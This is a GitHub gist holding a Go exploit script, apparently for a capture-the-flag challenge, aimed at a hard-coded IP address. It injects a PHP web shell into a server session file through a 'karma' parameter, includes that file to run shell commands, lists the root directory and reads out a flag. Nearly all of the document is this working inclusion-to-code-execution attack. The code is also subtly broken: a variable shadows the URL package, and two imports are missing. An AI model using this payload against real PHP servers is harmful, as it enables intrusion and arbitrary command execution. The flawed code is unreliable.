Skip to content

Instantly share code, notes, and snippets.

@Aviksaikat
Created December 27, 2022 11:44
Show Gist options
  • Save Aviksaikat/fb94cfe2b566111c3ef4307ee18c4071 to your computer and use it in GitHub Desktop.
Save Aviksaikat/fb94cfe2b566111c3ef4307ee18c4071 to your computer and use it in GitHub Desktop.
get flag script in go
package main
import (
"fmt"
"net/http"
"net/url"
"regexp"
)
var (
client = &http.Client{}
url = "http://44.200.237.73/"
payload = "?karma=%3C%3Fphp+system%28%24_GET%5B%27jadu%27%5D%29%3B+%3F%3E"
cmdRegex = regexp.MustCompile("FLAG{.*}")
)
func sendPayload() error {
_, err := client.Get(url + payload)
if err != nil {
return err
}
return nil
}
func executeCommand(cookie string, cmd string) (string, error) {
parameters := url.Values{}
parameters.Add("karma", fmt.Sprintf("/tmp/sess_%s", cookie))
if cmd != "" {
parameters.Add("jadu", cmd)
}
req, err := http.NewRequest("GET", url+"?"+parameters.Encode(), nil)
if err != nil {
return "", err
}
res, err := client.Do(req)
if err != nil {
return "", err
}
defer res.Body.Close()
buf := new(bytes.Buffer)
buf.ReadFrom(res.Body)
response := buf.String()
return response, nil
}
func main() {
res, err := client.Get(url)
if err != nil {
fmt.Println(err)
return
}
defer res.Body.Close()
cookie := res.Cookies()[0]
_, err = executeCommand(cookie.Value, "")
if err != nil {
fmt.Println(err)
return
}
err = sendPayload()
if err != nil {
fmt.Println(err)
return
}
response, err := executeCommand(cookie.Value, "ls /")
if err != nil {
fmt.Println(err)
return
}
file := cmdRegex.FindString(response)
if file == "" {
fmt.Println("Oops something wrong no output found!!")
return
}
err = sendPayload()
if err != nil {
fmt.Println(err)
return
}
response, err = executeCommand(cookie.Value, fmt.Sprintf("cat /%s", file))
if err != nil {
fmt.Println(err)
return
}
msg := strings.Split(response, ":")[1]
fmt.Println(msg)
flag := cmdRegex.FindString(msg)
fmt.Println("\nFlag: " + flag)
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment